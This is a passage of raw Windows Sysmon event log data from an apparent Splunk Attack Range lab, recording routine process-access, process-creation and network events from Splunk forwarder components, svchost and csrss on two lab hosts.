Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38BB116D47E415845EF15E73A0D02124,SHA256=4F5DC287778A9486CF1BA3812D93086DEC7C771DA1DD2640962266EEC9C8E01F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054951Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:26.061{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54195-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000980791Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:27.021{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8D17-6151-087A-00000000FD01}3964C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980790Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:27.021{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980789Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:27.021{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980788Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:27.021{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980787Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:27.021{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980786Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:27.021{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980785Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:27.021{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980784Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:27.021{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980783Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:27.021{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980782Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:27.021{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980781Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:27.021{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-8D17-6151-087A-00000000FD01}3964C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000980780Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:27.021{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8D17-6151-087A-00000000FD01}3964C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000980779Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:27.006{69CF5F33-8D17-6151-087A-00000000FD01}3964C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001054954Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:28.894{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B567AEA29B5053EE90229AAB692BCC0A,SHA256=509428F717C9B1296B26214912AAD2E01A6DCCCC8043A920AC1C10BA3129DED8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980822Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:24.831{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59512-false10.0.1.12-8000- 10341000x8000000000000000980821Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:28.396{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8D18-6151-0A7A-00000000FD01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980820Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:28.396{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980819Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:28.396{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980818Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:28.396{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980817Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:28.396{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980816Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:28.396{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980815Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:28.396{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980814Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:28.396{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980813Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:28.396{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980812Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:28.396{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980811Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:28.396{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-8D18-6151-0A7A-00000000FD01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000980810Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:28.396{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8D18-6151-0A7A-00000000FD01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program 